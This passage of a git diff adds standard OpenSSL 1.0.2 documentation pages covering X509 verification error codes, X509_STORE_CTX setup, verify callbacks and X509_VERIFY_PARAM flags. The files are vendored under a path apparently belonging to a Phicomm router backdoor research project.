+the certificate chain could be built up using the untrusted certificates but
+the root could not be found locally.
+
+=item B<X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY: unable to get local issuer certificate>
+
+the issuer certificate of a locally looked up certificate could not be found.
+This normally means the list of trusted certificates is not complete.
+
+=item B<X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE: unable to verify the first certificate>
+
+no signatures could be verified because the chain contains only one certificate
+and it is not self signed.
+
+=item B<X509_V_ERR_CERT_CHAIN_TOO_LONG: certificate chain too long>
+
+the certificate chain length is greater than the supplied maximum depth. Unused.
+
+=item B<X509_V_ERR_CERT_REVOKED: certificate revoked>
+
+the certificate has been revoked.
+
+=item B<X509_V_ERR_INVALID_CA: invalid CA certificate>
+
+a CA certificate is invalid. Either it is not a CA or its extensions are not
+consistent with the supplied purpose.
+
+=item B<X509_V_ERR_PATH_LENGTH_EXCEEDED: path length constraint exceeded>
+
+the basicConstraints pathlength parameter has been exceeded.
+
+=item B<X509_V_ERR_INVALID_PURPOSE: unsupported certificate purpose>
+
+the supplied certificate cannot be used for the specified purpose.
+
+=item B<X509_V_ERR_CERT_UNTRUSTED: certificate not trusted>
+
+the root CA is not marked as trusted for the specified purpose.
+
+=item B<X509_V_ERR_CERT_REJECTED: certificate rejected>
+
+the root CA is marked to reject the specified purpose.
+
+=item B<X509_V_ERR_SUBJECT_ISSUER_MISMATCH: subject issuer mismatch>
+
+the current candidate issuer certificate was rejected because its subject name
+did not match the issuer name of the current certificate. This is only set
+if issuer check debugging is enabled it is used for status notification and
+is B<not> in itself an error.
+
+=item B<X509_V_ERR_AKID_SKID_MISMATCH: authority and subject key identifier mismatch>
+
+the current candidate issuer certificate was rejected because its subject key
+identifier was present and did not match the authority key identifier current
+certificate. This is only set if issuer check debugging is enabled it is used
+for status notification and is B<not> in itself an error.
+
+=item B<X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH: authority and issuer serial number mismatch>
+
+the current candidate issuer certificate was rejected because its issuer name
+and serial number was present and did not match the authority key identifier of
+the current certificate. This is only set if issuer check debugging is enabled
+it is used for status notification and is B<not> in itself an error.
+
+=item B<X509_V_ERR_KEYUSAGE_NO_CERTSIGN:key usage does not include certificate signing>
+
+the current candidate issuer certificate was rejected because its keyUsage
+extension does not permit certificate signing. This is only set if issuer check
+debugging is enabled it is used for status notification and is B<not> in itself
+an error.
+
+=item B<X509_V_ERR_INVALID_EXTENSION: invalid or inconsistent certificate extension>
+
+A certificate extension had an invalid value (for example an incorrect
+encoding) or some value inconsistent with other extensions.
+
+
+=item B<X509_V_ERR_INVALID_POLICY_EXTENSION: invalid or inconsistent certificate policy extension>
+
+A certificate policies extension had an invalid value (for example an incorrect
+encoding) or some value inconsistent with other extensions. This error only
+occurs if policy processing is enabled.
+
+=item B<X509_V_ERR_NO_EXPLICIT_POLICY: no explicit policy>
+
+The verification flags were set to require and explicit policy but none was
+present.
+
+=item B<X509_V_ERR_DIFFERENT_CRL_SCOPE: Different CRL scope>
+
+The only CRLs that could be found did not match the scope of the certificate.
+
+=item B<X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE: Unsupported extension feature>
+
+Some feature of a certificate extension is not supported. Unused.
+
+=item B<X509_V_ERR_PERMITTED_VIOLATION: permitted subtree violation>
+
+A name constraint violation occurred in the permitted subtrees.
+
+=item B<X509_V_ERR_EXCLUDED_VIOLATION: excluded subtree violation>
+
+A name constraint violation occurred in the excluded subtrees.
+
+=item B<X509_V_ERR_SUBTREE_MINMAX: name constraints minimum and maximum not supported>
+
+A certificate name constraints extension included a minimum or maximum field:
+this is not supported.
+
+=item B<X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE: unsupported name constraint type>
+
+An unsupported name constraint type was encountered. OpenSSL currently only
+supports directory name, DNS name, email and URI types.
+
+=item B<X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX: unsupported or invalid name constraint syntax>
+
+The format of the name constraint is not recognised: for example an email
+address format of a form not mentioned in RFC3280. This could be caused by
+a garbage extension or some new feature not currently supported.
+
+=item B<X509_V_ERR_CRL_PATH_VALIDATION_ERROR: CRL path validation error>
+
+An error occurred when attempting to verify the CRL path. This error can only
+happen if extended CRL checking is enabled.
+
+=item B<X509_V_ERR_APPLICATION_VERIFICATION: application verification failure>
+
+an application specific error. This will never be returned unless explicitly
+set by an application.
+
+=back
+
+=head1 NOTES
+
+The above functions should be used instead of directly referencing the fields
+in the B<X509_VERIFY_CTX> structure.
+
+In versions of OpenSSL before 1.0 the current certificate returned by
+X509_STORE_CTX_get_current_cert() was never B<NULL>. Applications should
+check the return value before printing out any debugging information relating
+to the current certificate.
+
+If an unrecognised error code is passed to X509_verify_cert_error_string() the
+numerical value of the unknown code is returned in a static buffer. This is not
+thread safe but will never happen unless an invalid code is passed.
+
+=head1 SEE ALSO
+
+L<X509_verify_cert(3)|X509_verify_cert(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_get_ex_new_index.pod
new file mode 100644
index 0000000..8a9243d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_get_ex_new_index.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+X509_STORE_CTX_get_ex_new_index, X509_STORE_CTX_set_ex_data, X509_STORE_CTX_get_ex_data - add application specific data to X509_STORE_CTX structures
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509_vfy.h>
+
+ int X509_STORE_CTX_get_ex_new_index(long argl, void *argp,
+		CRYPTO_EX_new *new_func,
+		CRYPTO_EX_dup *dup_func,
+		CRYPTO_EX_free *free_func);
+
+ int X509_STORE_CTX_set_ex_data(X509_STORE_CTX *d, int idx, void *arg);
+
+ void *X509_STORE_CTX_get_ex_data(X509_STORE_CTX *d, int idx);
+
+=head1 DESCRIPTION
+
+These functions handle application specific data in X509_STORE_CTX structures.
+Their usage is identical to that of RSA_get_ex_new_index(), RSA_set_ex_data()
+and RSA_get_ex_data() as described in L<RSA_get_ex_new_index(3)>.
+
+=head1 NOTES
+
+This mechanism is used internally by the B<ssl> library to store the B<SSL>
+structure associated with a verification operation in an B<X509_STORE_CTX>
+structure. 
+
+=head1 SEE ALSO
+
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>
+
+=head1 HISTORY
+
+X509_STORE_CTX_get_ex_new_index(), X509_STORE_CTX_set_ex_data() and
+X509_STORE_CTX_get_ex_data() are available since OpenSSL 0.9.5.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_new.pod
new file mode 100644
index 0000000..b17888f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_new.pod
@@ -0,0 +1,122 @@
+=pod
+
+=head1 NAME
+
+X509_STORE_CTX_new, X509_STORE_CTX_cleanup, X509_STORE_CTX_free, X509_STORE_CTX_init, X509_STORE_CTX_trusted_stack, X509_STORE_CTX_set_cert, X509_STORE_CTX_set_chain, X509_STORE_CTX_set0_crls, X509_STORE_CTX_get0_param, X509_STORE_CTX_set0_param, X509_STORE_CTX_set_default - X509_STORE_CTX initialisation
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509_vfy.h>
+
+ X509_STORE_CTX *X509_STORE_CTX_new(void);
+ void X509_STORE_CTX_cleanup(X509_STORE_CTX *ctx);
+ void X509_STORE_CTX_free(X509_STORE_CTX *ctx);
+
+ int X509_STORE_CTX_init(X509_STORE_CTX *ctx, X509_STORE *store,
+			 X509 *x509, STACK_OF(X509) *chain);
+
+ void X509_STORE_CTX_trusted_stack(X509_STORE_CTX *ctx, STACK_OF(X509) *sk);
+
+ void	X509_STORE_CTX_set_cert(X509_STORE_CTX *ctx,X509 *x);
+ void	X509_STORE_CTX_set_chain(X509_STORE_CTX *ctx,STACK_OF(X509) *sk);
+ void	X509_STORE_CTX_set0_crls(X509_STORE_CTX *ctx, STACK_OF(X509_CRL) *sk);
+
+ X509_VERIFY_PARAM *X509_STORE_CTX_get0_param(X509_STORE_CTX *ctx);
+ void X509_STORE_CTX_set0_param(X509_STORE_CTX *ctx, X509_VERIFY_PARAM *param);
+ int X509_STORE_CTX_set_default(X509_STORE_CTX *ctx, const char *name);
+
+=head1 DESCRIPTION
+
+These functions initialise an B<X509_STORE_CTX> structure for subsequent use
+by X509_verify_cert().
+
+X509_STORE_CTX_new() returns a newly initialised B<X509_STORE_CTX> structure.
+
+X509_STORE_CTX_cleanup() internally cleans up an B<X509_STORE_CTX> structure.
+The context can then be reused with an new call to X509_STORE_CTX_init().
+
+X509_STORE_CTX_free() completely frees up B<ctx>. After this call B<ctx>
+is no longer valid.
+
+X509_STORE_CTX_init() sets up B<ctx> for a subsequent verification operation.
+The trusted certificate store is set to B<store>, the end entity certificate
+to be verified is set to B<x509> and a set of additional certificates (which
+will be untrusted but may be used to build the chain) in B<chain>. Any or
+all of the B<store>, B<x509> and B<chain> parameters can be B<NULL>.
+
+X509_STORE_CTX_trusted_stack() sets the set of trusted certificates of B<ctx>
+to B<sk>. This is an alternative way of specifying trusted certificates 
+instead of using an B<X509_STORE>.
+
+X509_STORE_CTX_set_cert() sets the certificate to be vertified in B<ctx> to
+B<x>.
+
+X509_STORE_CTX_set_chain() sets the additional certificate chain used by B<ctx>
+to B<sk>.
+
+X509_STORE_CTX_set0_crls() sets a set of CRLs to use to aid certificate
+verification to B<sk>. These CRLs will only be used if CRL verification is
+enabled in the associated B<X509_VERIFY_PARAM> structure. This might be
+used where additional "useful" CRLs are supplied as part of a protocol,
+for example in a PKCS#7 structure.
+
+X509_VERIFY_PARAM *X509_STORE_CTX_get0_param() retrieves an intenal pointer
+to the verification parameters associated with B<ctx>.
+
+X509_STORE_CTX_set0_param() sets the intenal verification parameter pointer
+to B<param>. After this call B<param> should not be used.
+
+X509_STORE_CTX_set_default() looks up and sets the default verification
+method to B<name>. This uses the function X509_VERIFY_PARAM_lookup() to
+find an appropriate set of parameters from B<name>.
+
+=head1 NOTES
+
+The certificates and CRLs in a store are used internally and should B<not>
+be freed up until after the associated B<X509_STORE_CTX> is freed. Legacy
+applications might implicitly use an B<X509_STORE_CTX> like this:
+
+  X509_STORE_CTX ctx;
+  X509_STORE_CTX_init(&ctx, store, cert, chain);
+
+this is B<not> recommended in new applications they should instead do:
+
+  X509_STORE_CTX *ctx;
+  ctx = X509_STORE_CTX_new();
+  if (ctx == NULL)
+	/* Bad error */
+  X509_STORE_CTX_init(ctx, store, cert, chain);
+
+=head1 BUGS
+
+The certificates and CRLs in a context are used internally and should B<not>
+be freed up until after the associated B<X509_STORE_CTX> is freed. Copies
+should be made or reference counts increased instead.
+
+=head1 RETURN VALUES
+
+X509_STORE_CTX_new() returns an newly allocates context or B<NULL> is an
+error occurred.
+
+X509_STORE_CTX_init() returns 1 for success or 0 if an error occurred.
+
+X509_STORE_CTX_get0_param() returns a pointer to an B<X509_VERIFY_PARAM>
+structure or B<NULL> if an error occurred.
+
+X509_STORE_CTX_cleanup(), X509_STORE_CTX_free(), X509_STORE_CTX_trusted_stack(),
+X509_STORE_CTX_set_cert(), X509_STORE_CTX_set_chain(),
+X509_STORE_CTX_set0_crls() and X509_STORE_CTX_set0_param() do not return
+values.
+
+X509_STORE_CTX_set_default() returns 1 for success or 0 if an error occurred.
+
+=head1 SEE ALSO
+
+L<X509_verify_cert(3)|X509_verify_cert(3)>
+L<X509_VERIFY_PARAM_set_flags(3)|X509_VERIFY_PARAM_set_flags(3)>
+
+=head1 HISTORY
+
+X509_STORE_CTX_set0_crls() was first added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_set_verify_cb.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_set_verify_cb.pod
new file mode 100644
index 0000000..b9787a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_set_verify_cb.pod
@@ -0,0 +1,161 @@
+=pod
+
+=head1 NAME
+
+X509_STORE_CTX_set_verify_cb - set verification callback
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509_vfy.h>
+
+ void X509_STORE_CTX_set_verify_cb(X509_STORE_CTX *ctx,
+				int (*verify_cb)(int ok, X509_STORE_CTX *ctx));
+
+=head1 DESCRIPTION
+
+X509_STORE_CTX_set_verify_cb() sets the verification callback of B<ctx> to
+B<verify_cb> overwriting any existing callback.
+
+The verification callback can be used to customise the operation of certificate
+verification, either by overriding error conditions or logging errors for
+debugging purposes.
+
+However a verification callback is B<not> essential and the default operation
+is often sufficient.
+
+The B<ok> parameter to the callback indicates the value the callback should
+return to retain the default behaviour. If it is zero then and error condition
+is indicated. If it is 1 then no error occurred. If the flag
+B<X509_V_FLAG_NOTIFY_POLICY> is set then B<ok> is set to 2 to indicate the
+policy checking is complete.
+
+The B<ctx> parameter to the callback is the B<X509_STORE_CTX> structure that
+is performing the verification operation. A callback can examine this
+structure and receive additional information about the error, for example
+by calling X509_STORE_CTX_get_current_cert(). Additional application data can
+be passed to the callback via the B<ex_data> mechanism.
+
+=head1 WARNING
+
+In general a verification callback should B<NOT> unconditionally return 1 in
+all circumstances because this will allow verification to succeed no matter
+what the error. This effectively removes all security from the application
+because B<any> certificate (including untrusted generated ones) will be
+accepted.
+
+=head1 NOTES
+
+The verification callback can be set and inherited from the parent structure
+performing the operation. In some cases (such as S/MIME verification) the
+B<X509_STORE_CTX> structure is created and destroyed internally and the
+only way to set a custom verification callback is by inheriting it from the
+associated B<X509_STORE>.
+
+=head1 RETURN VALUES
+
+X509_STORE_CTX_set_verify_cb() does not return a value.
+
+=head1 EXAMPLES
+
+Default callback operation:
+
+ int verify_callback(int ok, X509_STORE_CTX *ctx)
+	{
+	return ok;
+	}
+
+Simple example, suppose a certificate in the chain is expired and we wish
+to continue after this error:
+
+ int verify_callback(int ok, X509_STORE_CTX *ctx)
+	{
+	/* Tolerate certificate expiration */
+	if (X509_STORE_CTX_get_error(ctx) == X509_V_ERR_CERT_HAS_EXPIRED)
+			return 1;
+	/* Otherwise don't override */
+	return ok;
+	}
+
+More complex example, we don't wish to continue after B<any> certificate has
+expired just one specific case:
+
+ int verify_callback(int ok, X509_STORE_CTX *ctx)
+	{
+	int err = X509_STORE_CTX_get_error(ctx);
+	X509 *err_cert = X509_STORE_CTX_get_current_cert(ctx);
+	if (err == X509_V_ERR_CERT_HAS_EXPIRED)
+		{
+		if (check_is_acceptable_expired_cert(err_cert)
+			return 1;
+		}
+	return ok;
+	}
+
+Full featured logging callback. In this case the B<bio_err> is assumed to be
+a global logging B<BIO>, an alternative would to store a BIO in B<ctx> using
+B<ex_data>.
+	
+ int verify_callback(int ok, X509_STORE_CTX *ctx)
+	{
+	X509 *err_cert;
+	int err,depth;
+
+	err_cert = X509_STORE_CTX_get_current_cert(ctx);
+	err =	X509_STORE_CTX_get_error(ctx);
+	depth =	X509_STORE_CTX_get_error_depth(ctx);
+
+	BIO_printf(bio_err,"depth=%d ",depth);
+	if (err_cert)
+		{
+		X509_NAME_print_ex(bio_err, X509_get_subject_name(err_cert),
+					0, XN_FLAG_ONELINE);
+		BIO_puts(bio_err, "\n");
+		}
+	else
+		BIO_puts(bio_err, "<no cert>\n");
+	if (!ok)
+		BIO_printf(bio_err,"verify error:num=%d:%s\n",err,
+			X509_verify_cert_error_string(err));
+	switch (err)
+		{
+	case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT:
+		BIO_puts(bio_err,"issuer= ");
+		X509_NAME_print_ex(bio_err, X509_get_issuer_name(err_cert),
+					0, XN_FLAG_ONELINE);
+		BIO_puts(bio_err, "\n");
+		break;
+	case X509_V_ERR_CERT_NOT_YET_VALID:
+	case X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD:
+		BIO_printf(bio_err,"notBefore=");
+		ASN1_TIME_print(bio_err,X509_get_notBefore(err_cert));
+		BIO_printf(bio_err,"\n");
+		break;
+	case X509_V_ERR_CERT_HAS_EXPIRED:
+	case X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD:
+		BIO_printf(bio_err,"notAfter=");
+		ASN1_TIME_print(bio_err,X509_get_notAfter(err_cert));
+		BIO_printf(bio_err,"\n");
+		break;
+	case X509_V_ERR_NO_EXPLICIT_POLICY:
+		policies_print(bio_err, ctx);
+		break;
+		}
+	if (err == X509_V_OK && ok == 2)
+		/* print out policies */
+
+	BIO_printf(bio_err,"verify return:%d\n",ok);
+	return(ok);
+	}
+
+=head1 SEE ALSO
+
+L<X509_STORE_CTX_get_error(3)|X509_STORE_CTX_get_error(3)>
+L<X509_STORE_set_verify_cb_func(3)|X509_STORE_set_verify_cb_func(3)>
+L<X509_STORE_CTX_get_ex_new_index(3)|X509_STORE_CTX_get_ex_new_index(3)>
+
+=head1 HISTORY
+
+X509_STORE_CTX_set_verify_cb() is available in all versions of SSLeay and
+OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_set_verify_cb_func.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_set_verify_cb_func.pod
new file mode 100644
index 0000000..29e3bbe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_set_verify_cb_func.pod
@@ -0,0 +1,54 @@
+=pod
+
+=head1 NAME
+
+X509_STORE_set_verify_cb_func, X509_STORE_set_verify_cb - set verification callback
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509_vfy.h>
+
+ void X509_STORE_set_verify_cb(X509_STORE *st,
+				int (*verify_cb)(int ok, X509_STORE_CTX *ctx));
+
+ void X509_STORE_set_verify_cb_func(X509_STORE *st,
+				int (*verify_cb)(int ok, X509_STORE_CTX *ctx));
+
+=head1 DESCRIPTION
+
+X509_STORE_set_verify_cb() sets the verification callback of B<ctx> to
+B<verify_cb> overwriting any existing callback.
+
+X509_STORE_set_verify_cb_func() also sets the verification callback but it
+is implemented as a macro.
+
+=head1 NOTES
+
+The verification callback from an B<X509_STORE> is inherited by 
+the corresponding B<X509_STORE_CTX> structure when it is initialized. This can
+be used to set the verification callback when the B<X509_STORE_CTX> is 
+otherwise inaccessible (for example during S/MIME verification).
+
+=head1 BUGS
+
+The macro version of this function was the only one available before 
+OpenSSL 1.0.0.
+
+=head1 RETURN VALUES
+
+X509_STORE_set_verify_cb() and X509_STORE_set_verify_cb_func() do not return
+a value.
+
+=head1 SEE ALSO
+
+L<X509_STORE_CTX_set_verify_cb(3)|X509_STORE_CTX_set_verify_cb(3)>
+L<CMS_verify(3)|CMS_verify(3)>
+
+=head1 HISTORY
+
+X509_STORE_set_verify_cb_func() is available in all versions of SSLeay and
+OpenSSL.
+
+X509_STORE_set_verify_cb() was added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_VERIFY_PARAM_set_flags.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_VERIFY_PARAM_set_flags.pod
new file mode 100644
index 0000000..347d48d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_VERIFY_PARAM_set_flags.pod
@@ -0,0 +1,238 @@
+=pod
+
+=head1 NAME
+
+X509_VERIFY_PARAM_set_flags, X509_VERIFY_PARAM_clear_flags, X509_VERIFY_PARAM_get_flags, X509_VERIFY_PARAM_set_purpose, X509_VERIFY_PARAM_set_trust, X509_VERIFY_PARAM_set_depth, X509_VERIFY_PARAM_get_depth, X509_VERIFY_PARAM_set_time, X509_VERIFY_PARAM_add0_policy, X509_VERIFY_PARAM_set1_policies, X509_VERIFY_PARAM_set1_host, X509_VERIFY_PARAM_add1_host, X509_VERIFY_PARAM_set_hostflags, X509_VERIFY_PARAM_get0_peername, X509_VERIFY_PARAM_set1_email, X509_VERIFY_PARAM_set1_ip, X509_VERIFY_PARAM_set1_ip_asc - X509 verification parameters
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509_vfy.h>
+
+ int X509_VERIFY_PARAM_set_flags(X509_VERIFY_PARAM *param, unsigned long flags);
+ int X509_VERIFY_PARAM_clear_flags(X509_VERIFY_PARAM *param,
+							unsigned long flags);
+ unsigned long X509_VERIFY_PARAM_get_flags(X509_VERIFY_PARAM *param);
+
+ int X509_VERIFY_PARAM_set_purpose(X509_VERIFY_PARAM *param, int purpose);
+ int X509_VERIFY_PARAM_set_trust(X509_VERIFY_PARAM *param, int trust);
+
+ void X509_VERIFY_PARAM_set_time(X509_VERIFY_PARAM *param, time_t t);
+
+ int X509_VERIFY_PARAM_add0_policy(X509_VERIFY_PARAM *param,
+						ASN1_OBJECT *policy);
+ int X509_VERIFY_PARAM_set1_policies(X509_VERIFY_PARAM *param, 
+					STACK_OF(ASN1_OBJECT) *policies);
+
+ void X509_VERIFY_PARAM_set_depth(X509_VERIFY_PARAM *param, int depth);
+ int X509_VERIFY_PARAM_get_depth(const X509_VERIFY_PARAM *param);
+
+ int X509_VERIFY_PARAM_set1_host(X509_VERIFY_PARAM *param,
+				 const char *name, size_t namelen);
+ int X509_VERIFY_PARAM_add1_host(X509_VERIFY_PARAM *param,
+                                 const char *name, size_t namelen);
+ void X509_VERIFY_PARAM_set_hostflags(X509_VERIFY_PARAM *param,
+				      unsigned int flags);
+ char *X509_VERIFY_PARAM_get0_peername(X509_VERIFY_PARAM *param);
+ int X509_VERIFY_PARAM_set1_email(X509_VERIFY_PARAM *param,
+				 const char *email, size_t emaillen);
+ int X509_VERIFY_PARAM_set1_ip(X509_VERIFY_PARAM *param,
+			       const unsigned char *ip, size_t iplen);
+ int X509_VERIFY_PARAM_set1_ip_asc(X509_VERIFY_PARAM *param, const char *ipasc);
+
+=head1 DESCRIPTION
+
+These functions manipulate the B<X509_VERIFY_PARAM> structure associated with
+a certificate verification operation. 
+
+The X509_VERIFY_PARAM_set_flags() function sets the flags in B<param> by oring
+it with B<flags>. See the B<VERIFICATION FLAGS> section for a complete
+description of values the B<flags> parameter can take.
+
+X509_VERIFY_PARAM_get_flags() returns the flags in B<param>.
+
+X509_VERIFY_PARAM_clear_flags() clears the flags B<flags> in B<param>.
+
+X509_VERIFY_PARAM_set_purpose() sets the verification purpose in B<param>
+to B<purpose>. This determines the acceptable purpose of the certificate
+chain, for example SSL client or SSL server.
+
+X509_VERIFY_PARAM_set_trust() sets the trust setting in B<param> to 
+B<trust>.
+
+X509_VERIFY_PARAM_set_time() sets the verification time in B<param> to
+B<t>. Normally the current time is used.
+
+X509_VERIFY_PARAM_add0_policy() enables policy checking (it is disabled
+by default) and adds B<policy> to the acceptable policy set.
+
+X509_VERIFY_PARAM_set1_policies() enables policy checking (it is disabled
+by default) and sets the acceptable policy set to B<policies>. Any existing
+policy set is cleared. The B<policies> parameter can be B<NULL> to clear
+an existing policy set.
+
+X509_VERIFY_PARAM_set_depth() sets the maximum verification depth to B<depth>.
+That is the maximum number of untrusted CA certificates that can appear in a
+chain.
+
+X509_VERIFY_PARAM_set1_host() sets the expected DNS hostname to
+B<name> clearing any previously specified host name or names.  If
+B<name> is NULL, or empty the list of hostnames is cleared, and
+name checks are not performed on the peer certificate.  If B<name>
+is NUL-terminated, B<namelen> may be zero, otherwise B<namelen>
+must be set to the length of B<name>.  When a hostname is specified,
+certificate verification automatically invokes L<X509_check_host(3)>
+with flags equal to the B<flags> argument given to
+B<X509_VERIFY_PARAM_set_hostflags()> (default zero).  Applications
+are strongly advised to use this interface in preference to explicitly
+calling L<X509_check_host(3)>, hostname checks are out of scope
+with the DANE-EE(3) certificate usage, and the internal check will
+be suppressed as appropriate when DANE support is added to OpenSSL.
+
+X509_VERIFY_PARAM_add1_host() adds B<name> as an additional reference
+identifer that can match the peer's certificate.  Any previous names
+set via X509_VERIFY_PARAM_set1_host() or X509_VERIFY_PARAM_add1_host()
+are retained, no change is made if B<name> is NULL or empty.  When
+multiple names are configured, the peer is considered verified when
+any name matches.
+
+X509_VERIFY_PARAM_get0_peername() returns the DNS hostname or subject
+CommonName from the peer certificate that matched one of the reference
+identifiers.  When wildcard matching is not disabled, or when a
+reference identifier specifies a parent domain (starts with ".")
+rather than a hostname, the peer name may be a wildcard name or a
+sub-domain of the reference identifier respectively.  The return
+string is allocated by the library and is no longer valid once the
+associated B<param> argument is freed.  Applications must not free
+the return value.
+
+X509_VERIFY_PARAM_set1_email() sets the expected RFC822 email address to
+B<email>.  If B<email> is NUL-terminated, B<emaillen> may be zero, otherwise
+B<emaillen> must be set to the length of B<email>.  When an email address
+is specified, certificate verification automatically invokes
+L<X509_check_email(3)>.
+
+X509_VERIFY_PARAM_set1_ip() sets the expected IP address to B<ip>.
+The B<ip> argument is in binary format, in network byte-order and
+B<iplen> must be set to 4 for IPv4 and 16 for IPv6.  When an IP
+address is specified, certificate verification automatically invokes
+L<X509_check_ip(3)>.
+
+X509_VERIFY_PARAM_set1_ip_asc() sets the expected IP address to
+B<ipasc>.  The B<ipasc> argument is a NUL-terminal ASCII string:
+dotted decimal quad for IPv4 and colon-separated hexadecimal for
+IPv6.  The condensed "::" notation is supported for IPv6 addresses.
+
+=head1 RETURN VALUES
+
+X509_VERIFY_PARAM_set_flags(), X509_VERIFY_PARAM_clear_flags(),
+X509_VERIFY_PARAM_set_purpose(), X509_VERIFY_PARAM_set_trust(),
+X509_VERIFY_PARAM_add0_policy() X509_VERIFY_PARAM_set1_policies(),
+X509_VERIFY_PARAM_set1_host(), X509_VERIFY_PARAM_set_hostflags(),
+X509_VERIFY_PARAM_set1_email(), X509_VERIFY_PARAM_set1_ip() and
+X509_VERIFY_PARAM_set1_ip_asc() return 1 for success and 0 for
+failure.
+
+X509_VERIFY_PARAM_get_flags() returns the current verification flags.
+
+X509_VERIFY_PARAM_set_time() and X509_VERIFY_PARAM_set_depth() do not return
+values.
+
+X509_VERIFY_PARAM_get_depth() returns the current verification depth.
+
+=head1 VERIFICATION FLAGS
+
+The verification flags consists of zero or more of the following flags
+ored together.
+
+B<X509_V_FLAG_CRL_CHECK> enables CRL checking for the certificate chain leaf
+certificate. An error occurs if a suitable CRL cannot be found. 
+
+B<X509_V_FLAG_CRL_CHECK_ALL> enables CRL checking for the entire certificate
+chain.
+
+B<X509_V_FLAG_IGNORE_CRITICAL> disabled critical extension checking. By default
+any unhandled critical extensions in certificates or (if checked) CRLs results
+in a fatal error. If this flag is set unhandled critical extensions are
+ignored. B<WARNING> setting this option for anything other than debugging
+purposes can be a security risk. Finer control over which extensions are
+supported can be performed in the verification callback.
+
+THe B<X509_V_FLAG_X509_STRICT> flag disables workarounds for some broken
+certificates and makes the verification strictly apply B<X509> rules.
+
+B<X509_V_FLAG_ALLOW_PROXY_CERTS> enables proxy certificate verification.
+
+B<X509_V_FLAG_POLICY_CHECK> enables certificate policy checking, by default
+no policy checking is peformed. Additional information is sent to the 
+verification callback relating to policy checking.
+
+B<X509_V_FLAG_EXPLICIT_POLICY>, B<X509_V_FLAG_INHIBIT_ANY> and
+B<X509_V_FLAG_INHIBIT_MAP> set the B<require explicit policy>, B<inhibit any
+policy> and B<inhibit policy mapping> flags respectively as defined in
+B<RFC3280>. Policy checking is automatically enabled if any of these flags
+are set.
+
+If B<X509_V_FLAG_NOTIFY_POLICY> is set and the policy checking is successful
+a special status code is set to the verification callback. This permits it
+to examine the valid policy tree and perform additional checks or simply
+log it for debugging purposes.
+
+By default some additional features such as indirect CRLs and CRLs signed by
+different keys are disabled. If B<X509_V_FLAG_EXTENDED_CRL_SUPPORT> is set
+they are enabled.
+
+If B<X509_V_FLAG_USE_DELTAS> ise set delta CRLs (if present) are used to
+determine certificate status. If not set deltas are ignored.
+
+B<X509_V_FLAG_CHECK_SS_SIGNATURE> enables checking of the root CA self signed
+cerificate signature. By default this check is disabled because it doesn't
+add any additional security but in some cases applications might want to
+check the signature anyway. A side effect of not checking the root CA
+signature is that disabled or unsupported message digests on the root CA
+are not treated as fatal errors.
+
+The B<X509_V_FLAG_CB_ISSUER_CHECK> flag enables debugging of certificate
+issuer checks. It is B<not> needed unless you are logging certificate
+verification. If this flag is set then additional status codes will be sent
+to the verification callback and it B<must> be prepared to handle such cases
+without assuming they are hard errors.
+
+=head1 NOTES
+
+The above functions should be used to manipulate verification parameters
+instead of legacy functions which work in specific structures such as
+X509_STORE_CTX_set_flags().
+
+=head1 BUGS
+
+Delta CRL checking is currently primitive. Only a single delta can be used and
+(partly due to limitations of B<X509_STORE>) constructed CRLs are not 
+maintained.
+
+If CRLs checking is enable CRLs are expected to be available in the
+corresponding B<X509_STORE> structure. No attempt is made to download
+CRLs from the CRL distribution points extension.
+
+=head1 EXAMPLE
+
+Enable CRL checking when performing certificate verification during SSL 
+connections associated with an B<SSL_CTX> structure B<ctx>:
+
+  X509_VERIFY_PARAM *param;
+  param = X509_VERIFY_PARAM_new();
+  X509_VERIFY_PARAM_set_flags(param, X509_V_FLAG_CRL_CHECK);
+  SSL_CTX_set1_param(ctx, param);
+  X509_VERIFY_PARAM_free(param);
+
+=head1 SEE ALSO
+
